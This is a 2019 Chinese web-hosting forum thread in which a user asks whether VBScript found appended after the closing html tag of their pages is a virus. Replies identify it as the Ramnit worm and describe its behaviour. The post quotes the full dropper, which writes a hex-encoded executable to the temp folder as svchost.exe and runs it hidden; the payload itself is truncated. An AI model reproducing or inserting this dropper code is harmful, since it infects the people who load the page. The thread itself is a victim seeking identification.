全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworksBGVM服务器主机交流
IP归属甄别会员请立即修改密码Sharktech防护
查看: 1619|回复: 6

MJJ们这种是病毒吗,在html代码下面乱七八糟的乱码一大片

[复制链接]
发表于 2019-7-10 20:37:24 | 显示全部楼层 |阅读模式
本帖最后由 Tcp80 于 2019-7-10 06:57 编辑



乱七八糟的一大行,在</html>后SCRIPT开头
  1. <SCRIPT Language=VBScript><!--
  2. DropFileName = "svchost.exe"
  3. WriteData =  
  4. ""4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000303320838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C.......... ......... ......... ......... ........ 000000"
  5. Set FSO = CreateObject("Scripting.FileSystemObject")
  6. DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName
  7. If FSO.FileExists(DropPath)=False Then
  8. Set FileObj = FSO.CreateTextFile(DropPath, True)
  9. For i = 1 To Len(WriteData) Step 2
  10. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
  11. Next
  12. FileObj.Close
  13. End If
  14. Set WSHshell = CreateObject("WScript.Shell")
  15. WSHshell.Run DropPath, 0
  16. //--></SCRIPT>
复制代码


而且文件很大


网上说是html病毒,请问有了解的MJJ吗?
发表于 2019-7-10 21:07:34 | 显示全部楼层
是的,下一位
发表于 2019-7-11 09:03:24 | 显示全部楼层
是数据啊,手头如果有DB2数据库,你导出一个ixf文件,然后打开你就明白了
发表于 2019-7-14 22:08:02 | 显示全部楼层
像网马  不过好像只对老版IE有用,现在网马基本死翘翘了!
发表于 2019-7-14 22:59:10 | 显示全部楼层
是的哦 感染型病毒
Ramnit是一种蠕虫病毒。它能够感染用户计算机系统中的.exe、.dll和.html文件。
W32.Ramnit将自身加密以后附加到目标文件中。当被感染的文件运行时,该蠕虫会被释放到当前目录并被命名为[InfectedFilename]Srv.exe,然后执行。同时在%\ PR ogramFiles%\目录下增加一个MNetwork目录。感染该病毒的计算机会试图连接到网站rmnz[removed]ed.com,从该网站下载.dll文件注册到系统中。
该病毒主要通过移动存储介质进行传播。传播时,它会把自己拷贝到移动存储设备根目录下面的Recycle Bin目录中,同时创建autorun文件以达到自动启动的目的。
发表于 2019-7-15 01:08:59 | 显示全部楼层
肯定,不过只对超老版本 IE 起效吧,现在估计绝种了
发表于 2019-8-3 17:21:39 | 显示全部楼层
中过两次这个病毒。。。。影响并没多大。。。就是所有网页源码被污染,每次杀毒都一两天,,,
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|全球主机交流论坛

GMT+8, 2019-9-17 14:18 , Processed in 0.073355 second(s), 7 queries , MemCache On.

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表